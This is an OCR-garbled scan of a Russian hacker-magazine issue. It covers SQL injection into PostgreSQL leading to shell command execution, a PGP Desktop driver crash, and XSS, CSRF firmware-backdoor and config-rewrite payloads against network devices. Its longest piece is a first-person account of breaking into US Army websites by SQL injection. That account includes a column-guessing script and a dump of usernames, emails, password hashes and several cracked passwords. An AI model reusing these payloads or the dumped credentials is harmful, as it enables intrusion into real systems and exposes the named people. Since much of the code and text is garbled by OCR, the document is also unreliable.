системе какие-либо команды (запустить программу, прочитать файл, 
удалить его, создать новый). В РозІдгеЗОР это осуществимо несколь- 
кими методами. Самый «базовый» — заюзать стандартную функцию 
бЬс зузІетО. Такой метод реализован в известном проекте, активно 
используемом при пентестах — разбей і1.еісіескег.тГо/п^~оусІ:в/па5Ьеи, 
збРтТ). 



В чем состоит эксплуатация? Мы находимся в условиях функциониру- 
ющей ЗОР-іщесбоп: 

/зРоге . р1ір?іб=1 ; <Іпз'есРіоп> 

Еще со времен Розідгее ЗОЕ 8.1 можно создавать произвольные СВР- 
функции с подключением доступных обьектов. Например, так: 

СЕЕАТЕ ЕЕЫСТЮЕ зу зРет ( сзРгіпд ) ЕЕТЕЕЕЗ іпР АЗ '/ІІЬ/ 
ІіЬс.зо.б', 'зузРет' ЕАЫСЕАСЕ 'С ЗТЕІСТ. 

Помни, что функция зузІетО будет возвращать ІМТ-значение, хотя нам 
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Пень при внедрении дополните льных проверок версии НТТР приводит к| 
Дчень печальным последствияіѵ| 



нужно лицезреть стандартный 5І:сІои1:-поток. Для этого мы применяем 
та кую уловку: 

# создаем отдельную таблицу, куда будет попадать вывод 
/збоге . ріір?іб=1 ; СКЕАТЕ ТАВЕЕ зббоиб(іб зегіаі, зузбет_ 
оиб бехб) - 

# создаем ту самую злодейскую функцию 

/збоге . р1ір?іб=1 ; СКЕАТЕ ЕІІЫСТІОЫ зузбет ( сзбгіпд) 

КЕТЕКЕЗ іпб АЗ ' / ІІЬ/ ІІЬс . 30 . б ' , ' зузбет' ЕАЕСЕАСЕ ’С 
ЗТКІСТ -- 

# исполняем какую-либо команду с перенаправлением вывода 
в доступную для записи директорию 

/збоге . р1ір?іб=1 ; ЗЕЕЕСТ зузбет (' ипате -а > /бтр/безб ' ) - 

# копируем то , что осело после редиректа потока вывода в 
файл в таблицу зузбет_оиб 

/збоге . рЕр?іб=1 ; СОРУ зббоиб ( зузбет_оиб ) ЕКОМ ' /бтр/ 
безб ' - 

# организуем вывод результата 

/збоге.рЕр?іб=1 ЕЕІОЕ АЕЕ ЗЕЕЕСТ ШЕЕ, (ЗЕЕЕСТ зббоиб 
ЕКОМ зузбет_оиб ОКВЕК ВУ іб БЕЗО) , ШЕЕ ЕІМІТ 1 ОЕЕЗЕТ 1-- 

Иной вариант затрагивает аспект использован ИЯ Ргосесіигаі Іапдиаде 
Рипсііоп (РіЛсІ, Рі/рі, РІ/руіЬоп). Соответственно, Розідгее разрешает 
написание соответствующих функций на этих языках и использование 
ихдля выполнения операций в базе. 

# проверяем, доступна ли работа с РЕ/Руббюп в базе 
/збоге . рЕр?іб=1 ; ЗЕЕЕСТ соипб (* ) ЕКОМ рд_1апдиаде ШЕКЕ 
1аппате= ' рІрубЕопи ' 

# если нет , попробуем включить 
/збоге.рЕр?іб=1; СКЕАТЕ ЕАМСЕАСЕ рІрубЕопи 

# если такая работа поддерживается, то смело создаем спе- 
циальную функцию, которая будет принимать от нас запрос и 
интерпретировать на Руббюп 

/збоге.рЕр?іб=1; СКЕАТЕ ЕЕШТІОМ ргохузЕеІІ ( бехб ) 
КЕТЕКМЗ бехб АЗ ' ітрогб оз; гебигп оз . рореп (агдз [ О ] ) . 
геаб ( ) ' ЕАМСЕАСЕ рІрубЕопи 

# вызов функции с передачей параметров 
/збоге.рЕр?іб=1 ЕМІОМ АЕЕ ЗЕЕЕСТ ШЕЕ, 

ргохузЕеІІ ( 'Шоаті' ) , ШЕЕ ОЕЕЗЕТ 1; -- 

Аналогично можно заюзать Рі/Регі: 

# проверка доступности РЕ/Рег1 

ЗЕЕЕСТ соипб(*) ЕКОМ рд_1апдиаде ШЕКЕ 1аппате= 'рірегіи ' 




Зловещая программа дляфаззинга драйвер^ 



# создаем специальную функцию СКЕАТЕ ЕЕШТІОМ 
ргохузЕеІІ ( бехб ) КЕТЕКМЗ бехб АЗ ' ореп (ЕВ, " $_ [ О ] 
I " ) ; гебигп :'оіп( " " ,<ЕВ>) ; ' ЕАЫСВАОЕ рірегіи 

# передаем команды в качестве параметров 
ЗЕЕЕСТ ргохузЕеІІ (оз соттапб) ; 



»ТагдеІ5| 



Ро5Ідге5аі8.2/8.3/8.4 



I» Ехріоіізі 



Ьир://ппі[ѵѵОгпп. со пп/зріо 115/2009- и Ь розІдгездІисИ' 
5Ѵ5 0.0. 1 .Іаг.дг 



»5оІиІіоп 



Действия аналогичны Му501. 



Р6Р0Е5КТ0Р 9.0.6 
ЮСАЬ 

ОЕЫІАЬОРЗЕРѴІСЕ 



>> Вгіе^ 



I I / д Недавно Максим Суханов описывал принципиально 
новую атаку на раскрытие информации, хранимой 
в крипто-контейнерах, в том числе и этой софтины. 
Теперьзнаменитая Р6Р оказалась некомпетентна при обработке 
специально сформированной информации драйвером РОРѵѵбеб.зуз, 
— это приводит клокальному отказу в обслуживании и можетобер- 
нуться уничтожением ценной информации. Исследование показало, 
что драйвер некорректно обрабатывает ІОСТІ (0x80022038): 



ВеѵісеТуре: Сизбот Веѵісе Туре : 0x8002, 32770 
Тгапз бег Туре: МЕТНОВ_ВВЕЕЕКЕВ (0x0, 0) 

Ассезз Туре: ЕІЕЕ_АМУ_АССЕЗЗ (0x0, 0) 

Еипсбіоп Себе : 0х80Е, 2062 

Напомню, что ЮСТІ — это контроль ввода/вывода. Иными словами, 
системный вызов іосб выполняет различные управляющие действия 
над обычными устройствами и псевдоустройствами (для файлов, не 
являющихся псевдоустройствами, действия зависят от устройства). 
Аргументы соттапб и агд передаются в файл, ассоциированный с 
соответствующим дескриптором, и интерпретируются драйвером 
устройства. Кстати, после анализа крэш-дампа и исследования 
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Найти уязвимые роутеры мож но с 
Помощью боодіе Рогк из 6НРГ 



КІ5 70Ц Меіѵѵогк Росит епіЗегѵёгІ 
— собственной персонойі 



КЕНМЕ1_М00Е_ЕХСЕРТ10М_М0Т_НАМ01Е0 (8е). понимаешь, что 
присутствует аналогичная угроза падения в «синий экран». Обнару- 
жить такие вещи можно с помощью фаззинга — известного метода 
тестирования приложений. Суть его состоит в том, что, играясь с 
приложением разными аномальными данными, можно выявить места 
переполнений и некорректной обработки информации. Кдрайверному 
уровню в этом плане применимы следующие проекты: ІОСТЕ-ргоху 
( огапде-ЬаЕсот/сосіо/іосО-ргсху.гір ). кагіоііеі [ кагіоііеі.геѵегзетобе. 
сот/боѵупіоабз.рбр ]. 



<ітд згс=]тЩ:рз : / /10.1. 1.199 :2000/азах. 
ііЦт1?]тозЦпате=рго1епзе .тусіотаіп. сот&даСеѵ^ау= 

10.1.1. 1&сіпз = 10 .1.1. 1&зтРр = 10 .1.1. 1&тах_згс_ 
сопп=1 о 0&тах_згс_сопп_гаСе_пипп=1 о 0&тах_згс_сопп_ 
гаСе_зес = 10&Ыаск1ізЦ_ехр=3 б0 0&прр=прр . каскесі. 
сот&кіте20пе=СЕТ&зуз1од=зуз1од . каскей . сот&зуз1од_ 
ехк_1 = 4&зптр_риЫіс=риЫіс&зптр_1осакіоп=&сопРаск = 
асітіп%4 0ту(іотаіп . сот&1кр_зегѵег=1кр .каскей. сот&1кр_ 
рогк = 21&ІРр_1одіп=изег&ІРр_раззѵ\[сі=раззѵ\[ог(і&1кр_ 
гетоке_(ііг=%2Ркіз аскесі_1од&зср_зегѵег=зср . каскесі. 
сот&зср_рогР = 22&зср_1одіп=а(ітіп&зср_гетоке_ 

(ііг=%2Ркі 3 аскесі_1од&ІРр_аико_оп=оп&зср_аико_ 

оп=оп&ззк_оп=оп&гетоке_зиррогк_оп=оп&аскіоп=соп1ідиг 

акіоп&(іо=заѵе> 

Арріу пеѵ7 сопіідигакіопз : 

<ітд згс=кккрз ://10.1.1.199: 2000/а^аx.кРт1?аскіоп=^ез 
кагР&(іо=соге> 



>>ТагдеІ5| 



РбРОезкІор 9.0.6 [Виіісі 6060] 



|>> Ехріоіізі 



Рабочий эксплойт можно найти по адресу Ы:І:р://ѵѵѵѵѵѵ.еѵіШпдег5.сопп/ 
абѵ щ сг у/РСРРезкІор 9 0 6 Репіаі 01 Зегѵісе РОС.рЬр . 
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Исправлений уязвимости пока нет. 



Добавляем ргоху: 

<ітд згс=кРРрз ://10. 1.1. 199:2000/ аз ах. 
кРт1?ѵкозк_ргоко=кРРр&ѵкозк=ѵкозк . сот&ѵкозк_ 
рогР=80&гкозк_ргоко=кккр&гкозк=10 .1.1. І&гко 
зк_рогк = 8 0&тосіе_разз = оп&хт1е=оп&епаЫе_1і1е_ 
ир1оасі=оп&зкакіс_раззккгоидк=оп&аскіоп=а(і(і&(іо=заѵе> 

Отключаем всю красоту («гасим свечи»): 




МНОГОЧИСЛЕННЫЕУЯЗВИМОСТИ 
в по АППАРАТНЫХ СЕТЕВЫХ 
УСТРОЙСТВ 



<ітд згс=кРРрз : //10.1. 1.199 :2000/азах. 
кРт1?аскіоп=зкик(іоѵ\?п> 



Х55: 



Если нельзя взломать сам сервис, на машине, сервере, принтере или 
ином оборудовании, исследуем его фронтенд (ѴѴЕВ-админки; панели 
управления, если она доступна). Вот баги, которые были обнаружены: 

Вендор: АХІ5 

АХІ5 700 Меіууогк Роситепі: Зегуег 
Атака: Х55 + локальный инклуд 

Эксплуатация: 

Х55: 

• кССр : / / [ зегѵег ] /изег/кеір/кеір . зкРт1?<зсгірк>а1егР ( 

' ХЗЗ ' ) </зсгірР> 

• кРРр : / / [ зегѵег] /изег/ке1р/депега1_ке1р_изег . зкРт1?< 
зсгірк>а1егР ( ' ХЗЗ ' ) </зсгірк> 

Локальный инклуд в модуле помощи (изег/ЬеІр/ЬеІр.зЫппІ), позволяю- 
щий читать любые файлы на сервере: 

• кккр : // [зегѵег] /изег/кеір/кеір . зккт1?/асітіп/Ркіз_ 
зегѵег/ккіз_зегѵег . зккті 

Вендор: Ргоіепзе 

Рго^епзе ѴѴеЬ АррОсаОоп ЕігеууаО 

Атака: Х5РЕ/Х55 

Эксплуатация: 

«Наш продукт защищает от всех угроз, описанных в десятке 
0ѴѴА5Р» — цитируем разработчиков проекта. Спорить с ними не 
будем, но вендор, защищающий от наиболее популярных ѴѴЕ В -уг- 
роз, сам же забыл позаботиться о своей безопасности! Включаем 
55Н/5ММР: 



• кккрз : //10 .1.1. 199 : 2 0 0 0 /ргоху . ккті ?аскіоп=тападе&та 
іп=1од&зко\л?=(1епу_1од&ргоху=>"<зсгірк>а1егк (коситепк . 
соокіе) </зсгірк> 

Вендор: ВЫМК 
В-бпкѴоІР РЬопе Абаріег 

Атака: перезапись «прошивки»устройства + Х55 

Эксплуатация: 

Подготавливаем файл для С5РЕ-нападения со «своей прошивкой»: 

<ккт1> 

<1огт аскіоп= "ккРр : //10 .1.1. 1бб/Рогтз/сЫ_Зек_ЗШ_ир(1а 
ке?1бб40,0,0,0,0,0,0,0,0" теккосі= " РОЗТ " > 

<іприк пате= "раде_Нісі(іепѴаг " ѵа1ие="0"> 

<іприк пате= " ТРТРЗегѵегАсісігеззІ " ѵа1ие="10"> 

<іприк пате= " ТРТРЗегѵегА(і(ігезз2 " ѵа1ие="1"> 

<іприк пате= " ТРТРЗегѵегАксігеззЗ " ѵа1ие="1"> 

<іприк пате= " ТРТРЗегѵегА(і(ігезз4 " ѵа1ие="1"> 

<іприк пате= " Рігтѵ^агеЮрсіаке " 
ѵа1ие= " епаЫек" > 

<іприк пате= " РіІеЫате " ѵа1ие= "Ьасксіооге(і_1ігт\л[аге . 
ітд " > 

<іприк куре=зиЬтіР ѵа1ие= " аккаск" > 

</ когт> 

</ккт1> 

Применяем социальную инженерию и впариваем «товар» админу. 

Х55: 

• кккр://10.1.1. 1бб/Рогтз/раде_СкдВеѵІпко_Зек?%ЗСзсгі 
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р1:%ЗЕа1ег^ ( %2 2}іаске(і%2 2 ) %ЗС/зсгірР%ЗЕ 



Вендор: ЗСОМ 

ЗСот ОІЛсеСоппесІ; ѴѴігеІезз СаЫе/051 Коиіег 
Атака: обход авторизации 

Эксплуатация: 

Чтобы управлятьустройством полноценно, требуется пройти 
жесткую авторизацию. Без нее стороннему пользователю запре- 
щено просматривать какие-либо внутренние страницы. При более 
детальном исследовании ПО выявилось присутствие нескольких 
СОІ-сценариев. Например, утилиты бекапа («Бузіет Тооіз 
Сопбдигабоп ^ Васки р Сопбдигабоп»). Любой, в том числе, неавто- 
ризированный пользователь, может обратиться к ней — и выкачать 
файл, который она генерирует (сопбд.Ьіп). А ведь божественное 
предназначение этой утилиты — создавать резервную копию дан- 
ных, содержащую конфигурационные настройки, логины, пароли, 
ѵѵіб-ключи, 5птр-пароли и многое другое. 

ЛЦЦр : / / <ІР>/ЗаѵеС:ЕдЕі1е . сді 

Содержание сопбд.Ьіп: 

ррр о е_и 3 е г пате = ххххххххххххххх 
рррое р аззѵ^ог(і=ххххххххх 
ррр о е_ 3 е г V і с е_пате = ххххххххх 

[. . .] 

тг а (і і и 3 _и зегпате=хххххх 
тг а (і і и 3 _р а 3 3 ѵ\?о г Л = хххххх 
тгасііиз_зесгеЦ=ххххххх 

[. . .] 

Для решения проблемы требуется отключить опцию «Веппоіе 
Абппіпізігабоп»: 

Ы:1:р://\л/ѵѵ\л/.5есигіЫоси5.сопп/агсЫѵе/1/500762/30/0ЛЬгеасІесІ. 

Вендор: СІ5С0 
СІ5С0І05 
Атака: Х5РР/Х55 
Эксплуатация: 

Проверяем наличие НТТР-сервера: 

:Еигс]тРЬаг#з}іоѵ\? ір ЛРРр зегѵег зЕаСиз I іпсіисіе зЕаЕиз 

НТТР зегѵег зЕаЕиз: ЕпаЫеЛ 

НТТР зесиге зегѵег зЕаЕиз: ЕпаЫеЛ 

Еигс1іЕЬаг#з]т ір іпЕ Ьг | і ир 

ЕазЕЕЕііегпеЕО/0 192.168.1.2 УЕЗ ЫѴКАМ 

ир ир 



Х55: 



•]пЕЕр://192.1б8.1. 2 / Іеѵеі/ 15/ехес/-/ " хЬосіу 
оп1оа(1=а1егЕ ( "Ьид" ) > 

• ЦЕЕр :/ /192 . 168 . 1 . 2 /іеѵеі/ 15/ехес/ -/" хіігате опіоасі = аІегЕ 
( " Ьид " ) > 

• ЬЕ Ер ://192. 168.1. 2 /ехес/ " хЬоЬу опіоасі- " аІегЕ ( ' Ьид ' ) ; " > 

С5РР (пример изменения]: 

• ЬЕЕр: //192 . 168 . 1 . 2/1еѵе1/15/ехес/-/ "хЬосІу опіоасі-ѵ^іпсіоѵ^ . 
ІосаЕіоп ='ЬЕ Ер ://192. 168.1. 2 /1еѵе1/15/сопЕідиге/-/ЬозЕпате 
/виССУ/СЕ' > 

Активный ресеч при обнаружении этихуязвимостей проявили: 

□ ідііаі Бесигііу Резеагсб Огоир [ПЗесРб], израильская команда 
ВіпагуѴізіоп, Биса СагеЛопі [ [иса.сагеиопКаЛіккізоЛісІоЛсопп ]. пг 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



• Подключение - в любом месте 
Москвы и Московской обл. 



• Срок подключения в Москве - 14 дней, 
в Московской обл. - от 14 до 30 дней. 

Установка прямого московского телефонного номера 

• Многоканальные телефонные номера 

• ІР-телефония 

• Выделенные линии Интернет 

• Корпоративные частные сети (ѴРМ) 

• Хостинг, услуги сіаіа-центра 



РМ Телеком 

Ѵі/ѵ\^ѵ^.гтТ.ги е-таіІ:іпТо@гт(.ги (495) 988-8212 
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Приглашаем специалистов, имеющих 
опыт работы в области телекоммуникаций 




взлом 



» 




АТАКА 



АРМУ. 






ГіІІІІІІІ - 







Т 



Т 



ВЗЛОМ ОФИЦИАЛЬНЫХСАИТОВ АРМИИ США 



I 



I 




агтѵ. 

тіі 

агтѵ. 

тіі 




- и н^^шько 

в публичном секторе. Нередко в СМИ о том, что взло- 

ман крупный государственный или д^^^^^^^^^^^^^^антастика или 
явные бреши в безопасности? Вокруг историй взломов обычно много баек 
и журналистских фантазий. До правд^^^^^^^^^^^^то. Специально для 
журнала < Г5Г акер» в этой статье представлен взлом одного из самых маститых 
проектов военного сектора США- Агту.тіі. 



ели проанализировать лентузеркал «дефейсов» прави- 
тельственных ресурсов, которую ведет портал 2опе-Ь. 
огд, интерес злоумышленников к проектам такого рода 
становится почти очевидным. Влечетих и чистый энтузиазм 
(спортивный интерес и повышение собственной репутации), и стремле- 
ние кзаработку (продажа доступов, информации), и злостный шпионаж 
(информационная разведка). 

Первые, казалось бы, шуточные упоминания о взломе официального 
сайта армии СШАбыли оставлены неизвестным хакером каіЬагзіз 
(им снято видео П5 Агту НАСК— располагается по ссылке каШагвІв. 
ЬрІасеб.пеі/агппѵЬаск.Ыпп ). Ряд подпроектов ( срта.ард. агту.тіі . 2го1:с. 
агту.тіі ) был затронут в 2000 году хакерской группой «Сгіте Ьоуз». Ауже 
ближе кнашим дням, после военного конфликта в Газе, не без турецкой 
помощи были взломаны зоа.тбѵу. агту.тіі . тбуу.агту.тіі . тбуѵууеЬ. 
тбуу.агту.тіі и зрігііоіатегіса.тбуу.агту.тіі . 

Каквидишь, аппетиты хакеров в этой сфере ничем не ограничены. 

Н В БОЙ! 

Не будутратить время на переливание из пустого в порожнее. Буквально 
сразу мое внимание обратилось к проверке структур параметризован- 
ныхзапросов: 

• йЦЦр : / /ѵллпл?4 . агту .ті1/оС:Е/зЦогу . р1ір?і(і=1 

• йССр: / /штА . агту.тіі /оС^/зСогу. р1ір?ісі= -313 37 

Картина не изменилась, поэтому целью будущих действий была экс- 
плуатация 50Г-іп)есІіоп — одной из самых критичных атак по мнению 



ѴѴеЬ Арріісаііоп Зесигііу Сопзогііит. Подбор колонок после нескольких 
неудачных попыток осуществлялся автоматизировано, с помощью 
специально написанного скрипта в пару строк: 

ітрогЦ 03, зуз , ІіЦЦрІіЬ 
# опознаем путь для инъекции 

р = ’ІЩЦр: //ѵллм4 . агту.тіі /оСі/зСогу .р]лр?ісЗ= 1+АКБ+ 1=2 +и 
ЫІОЫ+ЗЕЦЕСТ+ ' 

сіеі ііпсі (іюзС , р) : 

Сгу : # задаем растущий ряд 0 , 1 , 2 , 3 , 4 ... 
іог і іп гапде(50) : 

СОІІЗ = р+зСг(і)+' , ' 

# выполняем запрос с проверкой кода ответа 

й = йРРрІіЬ . НТТР (іюзС ) 

й . риСгериезС ( ' СЕТ ' , соІІз) 

й . риСІіеасіег ( ' АссерС ' , ' СехР /йрті ' ) 

й . риСІіеасіег ( ' АссерС ' , ' СехС /ріаіп ' ) 

й. епсІІіеасЗегз ( ) 

еггсоеЗе, еггтзд, йеасЗегз = й . деСгерІу ( ) 
іі еггсосЗе==2 00 : 

РГІПР СООІЗ 

ехсерЦ : 
разз 
ііпсЗ(р) 

Результат работы скрипта: 
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: / /шш4: . агту .ті1/о1::Е/з^огу . р1ір?і(і=1+АЫВ+ 
1=2+иЫІОЫ+ЗЕЬЕСТ+0 ,1,2,3,4,5,6,7,8,9,10,11,1 

2.13.14.15- - 

С разу же, не задумываясь, смотрим информацию по базе: 

ІіСРр : / /штА . агту .тіІ/оСІ/зСогу . ріір? ісі=1+АЫВ+ 
1=2+ВЫІОВ+ЗЕЕЕСТ+0 , 1 , сопсаВ (изег ( ) , 0x2 0 , сіаВа 
Ьазе ( ) , 0x20 , ѵегзіоп () ) ,3,4,5,6,7,8,9,10,11, 

12.13.14.15- - 

Ответбазы выглядел следующим образом: 

Пользователь : оВВ_ѵ\?еЬ_изег@1оса1ВюзВ 
База: оВВ 

Версия: 4.1.22-1од 

Сперва я подумал, что от важных данных мы далеки, и до 
их получения еще пилить и пилить. Максимум, что можно 
получить — доступ к секции «ОТР» [ ѵѵѵѵѵѵД.агппѵ.ппіІ/оіЯ . 
По-видимому, она являлась неким модулем общей СМ5 
сайта, под который отводился отдельный пользователь 
для модерации. Но потом я понял, что все не совсем так. 
Поехали дальше. Му5014.* не предоставляет возможнос- 
ти в явном виде узнать имена таблиц и колонок. Специ- 
альная системная таблица (іпІогта1:іоп_5сбеппа) для этого 
есть только в 5.*, поэтому обратимся к перебору наиболее 
частых — например, «изегз»: 

ПВВр : / /штА . агту .тіІ/оВВ/зВогу . рПр? ісі=1+АЫВ+ 
1=2+ВЫІОЫ+ЗЕЕЕСТ+0 ,1,2,3,4,5,6,7,8,9,10,11,1 
2 , 13 , 14 , 15+ЕКОМ+изегз (ОК) 

Передвигаемся к подбору колонок. Лично я делаю это по 
специально составленному словарю: 

• ііВВр : / /шшА . агту .тіІ/оВВ/зВогу . р1ір?і(і=1+АЫ 
В+1=2+ВЫІОЫ+ЗЕВЕСТ+0 , 1 , соипВ (изег_изегпате) 
,3,4,5,6,7,8,9,10,11,12,13,14, 15+ЕКОМ+изегз 
(понимаем, что там хранится 5 юзеров) 

• ПВВр : / /шшА . агту .тіІ/оВВ/зВогу . р1ір?і(і= 
1+АЫВ+1=2+ВЫІОЫ+ЗЕЕЕСТ+0 , 1 , сопсаВ (изег_ 
изегпате , 0x2 0 , изег_рѵ^, 0x2 0 , изег_етаі1 ) ,3,4, 
5,6,7,8,9,10,11,12,13,14, 15+ЕКОМ+изегз+ЕІМІ 
Т+1,2 

Напомню, что оператор ЫМІТ ограничивает число эле- 



ментов, выдаваемых 5 ЕРЕСТ. Первый параметр — с какой 
записи, а второй — сколько. Изменяя эти параметры, мы 
парсим данные всех пяти юзеров. Нашими героями дня 
оказались: 

сЬгіз.сІагке 4Ве249Ь9а808 0а4с14 05517а27ВсісаЬ55 
а СІ1ГІЗ . сІагкеЮиз . агту .тіі 

тедЬап . тогап а21100Ь6490а2006аЬ94еВа9580е987 
6 тогашпОВІеізІітап . сот 

тісЬаеІ . каВзи:Егакіз ВЬ4Ь04а6Ь48с3626В4(і8с25ВЬ 
ІсЗ ВсЬа2 тісііаеі . каВзиВгакізОиз . агту .тіі 
гуапз аса2а6Вс(іс09с1699458В(і55аЬсВсаВЗ гуапзО 
Віеізктап . сот 

Ьауезп 717е17 492ае4Ь0ес6с15аеЬ2(і2 5 0Ве442 
кауезпОВІеізктап . сот 

Адм и н ка : Ьир://ѵѵѵѵѵѵ4.агппѵ.ппі[/оЛ/асІппіп/Еоаіп/[оаіп.рбр . 

Н АРМЕЙСКИЕ НОВОСТИ 

Кроме новостного подпроекта, касающегося «Операции 
Свобода», меня интересовал непосредственный доступ 
к АПМЕѴѴ5 (модулю управления армейскими новостями). 
Юмор состоял в том, что находился он неподалеку и обла- 
дал абсолютно аналогичной уязвимостью: 

кВВр: / /ѵгтя А . агту .тіі /осра/геасі.р]тр?зВогу_і(і_ 
кеу=5061 

Вся разница заключалась в числе колонок: 

• кВВр : / /шш А . агту .ті1/оВВ/зреес1і.р]тр?зВогу_ 
ісі_кеу=9859+АМВ+1=2+ШІОМ+ЗЕЕЕСТ+0 ,1,2,3, сопса 
В (ЛаВаЬазе ( ) , 0x20 , %20изег () ) ,5,6,7,8,9,10,11-- 

• кВВр: / /шшА . агту .ті1/оВВ/зреес1і.р]тр?зВогу_ 
і(І_кеу=9 859+АЫВ+1 = 2+иЫІОМ+ЗЕЕЕСТ+0, 1,2 ,3 , соп 
саВ (изег_изегпате , 0x2 0 , изег_рѵ^, 0x2 0 , изег_ета 
І1) , 5 , 6 , 7 , 8 , 9 , 10 , 11+ЕКОМ+изегз 

Но база там другая, да и юзеров куда больше: 

ЛаВаЬазе: осра 

изег: ОСРАизегЬазісОІосаІВюзВ 

Вот дамп пользователей из нее: 

[0] гаск.кеѵіВ : 04Цас8а1е0са501587ЬаЦ6б1бЬ5се5а(1 : 
гаек. кеѵіВ @1-3 сот. сот: гаек. кеѵіВ@1-3 сот. сот: 




> СІѴСІ 

Огромный словарь из 
более чем 700 таблиц 
и колонокты можешь 
найти на нашем 
диске. В трудную 
минуту он тебе очень 
пригодится! 
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Все попытки создать новость были успешными, а вотудалить - нет. 

В итоге, созданные пробные новости остались администраторам сайта в 
ікачестве почетного раритета^^^^^ 



Вотони! Как видишь, трое пользователей имеютуровень доступа 
5у5І;епп_аи». Хэши этих пользователей у нас были, поэтому дело оста 
валосьза малым - взломать их] 



[2] раТгісіа . йоѵтз : 5сба:Еббе2е7е5:Ее23с434ЬЗ :Е5с4ес2Ь:Е :раТгісіа. 
йоѵтз@зтс . агту .тіі : 

[3 ] Іаига . йе:Егапсізсо : с8ЫЬ73225е589бе0бс19Ы:Еб09йс8бЗ : Іаига . 
йе:Егапс1зсо@]прсЗа . агту .тіі : 

[4] гоЬЬіе.СДотрзоп:Ь6917881й58б88ай39б501і773Ь5сі647:гоЬЬіе. 
ЫіотрзопОІ-Зсот. сот: 

[5 ] азЫеу . зТеТТег : еа13Ьа548йаб7107бес1аЗа03сЬй2а40 : азЫеу . 
зТеТЬег@]гірсіа . агту .тіі : 

[6] кеггу .теекег : с8ЫЬ73225е589бе0бс19Ы1б09йс8бЗ :кеггу. 



теекег (ікрсЗа . агту .тіі: Уровни доступа пользователей, которые ун ас были, различались от| 

[7] сіаѵісі.катгіс:55231502і554еі71іаа789сі1а135866а:сіаѵій. |Н 0 ВИЧКа» (іОПІОг) ДО «ГЛаварЯ» ( 5 |> 1 епп_аи]| 



1іатгіс(і1-Зсот. сот: 



[8] ѵ^і11.Ьга11:сЬ7сй4с336с255б0286іеб9Ь55335325:ѵ^і11.Ьга11@ 
из . агту .тіі : 

[9] аззідптепТ .йезк: 4а29йс14150й0018е84480238е4сЬ3110 : 
аззідптепТ(іезк@зтс . агту .тіі : 

[10 ] тіскаеі . какзиігакіз : 1Ь4Ь04абЬ48й62б14са8с251ЫсЗ 1сЬа2 : 
тісііаеі . каТзи1гакіз@из . агту .тіі : 

[11] ѵіског .каггіз : 19ЬЬе1е289е380058аа0сЗс0500е21бсе : ѵіског . 
каггізѲиз . агту .тіі : 

[12 ] етта. йогіег : сбебс42бсЗЬсЗ б7й1с1МеаЗй07 0Ь5ассЗ : етта. 
йо 2 Іег@зтс . агту .тіі : 

[13 ] скгіз . сіагкеі : е7еаЗсі9Ь4е0еа9321Ьйеа3412Ь56есі77 : скгіз . 
с1агке1@из . агту .тіі : 

[14] ^ас^иез.Ьаппатоп:29287 89921с53 0сі8551395Ьсій187 53б1: 

3 ас диез . ЬаппатопОзтс . агту . тіі : 



Сканера бою!| 




[15] йеера . такепйги : 5782йЬ43сеа274аЬ2е45с413б318аеа0 :йеера. 
такепйгиѲІ-Зсот. сот: 

[ 16 ] тісіпаеі . гаикіо : 195б131322571б9Ь4Ьй1б533ба9с7 8б9 :тіс]іае1 . 
гаикіоОзтс . из . агту .тіі :тіс1іае1 . гаикіоОзтс . из . агту .тіі : 



Некоторые из расшифрованныхучетныхзаписей удивляли своей про- 
стотой. Напомню, что стойкость любого пароля или шифра измеряется 
степенью своей упорядоченности (энтропией]. Измеряется она не 
такой уж сложной формулой: Н = Ыод2Ы=ь 1одЫ/1од2, где I— ко- 
личество символов в пароле, а N — количество возможных символов. 
Скажем, если исследуемый пароль «оиоппоііо», то 1=9, а N=26 (столько 
букв в английском алфавите с учетом только нижнего регистра]. По ста- 
тистическим данным, упорядоченность, приходящаяся на каждый сим- 
вол притоком раскладе, — 4.9 бит, что говорит о достаточной простоте 
подбора пароля. Например, при использовании N=94 (все символы 
А5СІІ] она равна 6.55. Интереса ради ты можешь посчитать энтропию 
паролей, которые были выцеплены из адм и неких армейских хэш ей: 

Ьб917 881(і58б8 8асіЗ 9 б5011773Ь5саб47 : 7779311 
оЬЫе.к1іотрзоп:Ьб917 881с358б88а(і3 9б5011773Ь5саб47 : 
гоЬЬіе . ■ЫіотрзопѲІ-Зсот. сот: 

Іодіп: оЬЬіе . кіютрзоп 
разз: 7779311 

04сЗас8а1е0са5 01587Ьа(1бб1бЬ5се5асЗ:]те11окіР1:у 
гаек, кеѵіі: : 04сіас8а1е0са5 01587ЬасЗбб1бЬ5се5а(1: гаек. 
кеѵік@1-Зсот. сот: гаек. кеѵік@1-3 сот. сот: 

Іодіп: гаск.кеѵік 
разз: кеііокікку 

Многие хакеры для взлома хэшей не используют собственные вычис- 
лительные мощности. Можно воспользоваться существующими паблик 
проектами для крекинга хэшей. В Сети их нетакуж и мало. На нашем 
дискеты найдешь специальный скрипт от меня, который делает это в 
миг, прогоняя хэш по 1 9 популярным сайтам. Абсолютно другая админ- 
ка обнаружилась здесь: бир://\л/ѵуѵѵ4.агппѵ.ті[/осра/абппіп . 

Улыбнуло, что сама система новостных обновлений там была еле допи- 
сана. Это можно было заметить потому, что когда я пробовал удалять 
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ервый герой из базы ОТР. Остал ьных мы ис кали ЫМІТ’ом* 

Шм і м іі мч іті Гііііііііііі 



или изменять какие-либо новости, она обращалась к несуществую- 
щим скриптам. 



сіігез . аррепсі ( і ) 
ехсерр ІОЕггог: 
разз 



I 



Н РАЗВЕДКА АДМИНИСТРАТИВНЫХ ДИРЕКТОРИЙ 

Если проанализировать весь взлом, действия злоумышленника 
сводились к эксплуатации атаки класса «ЗОЕ-іщесбоп» и разведке 
административных директорий. С первым мы более-менее разобра- 
лись, теперь коснемся второго. Для этой задачи существует огромное 
количество утилит. Методика их сводится ктому, что путем посылки 
НЕАО-запроса на заданную директорию они проверяют код ответа. 
Ниже я приведу свой собственный скрипт, который часто использую 
в работе. Он делает все потой же схеме, но вдобавоканализирует ди- 
ректор и и по файлу гоЬоІз.ІхІ: (на официальном сайте Армии США, его 
кстати, не было). Я использую централизованную базу в зрбіе, которую 
периодически пополняю. 

ітрогЦ 03, зуз , здІіСеЗ , ІіССрІіЬ, ге, Іосаіе 

# сосііпд: иС:Е-8 
ітрогР Щтгеасі, зрІіСеЗ 

# объявляем пустую списковую переменную, куда будут по- 
мещаться все найденные неповторяющиеся директории 
бігез = [ ] 

# задаем функцию для проверки на наличие директории 
НЕАВ ' ом 

беб сйеск (йозб , р) : 
бгу: 

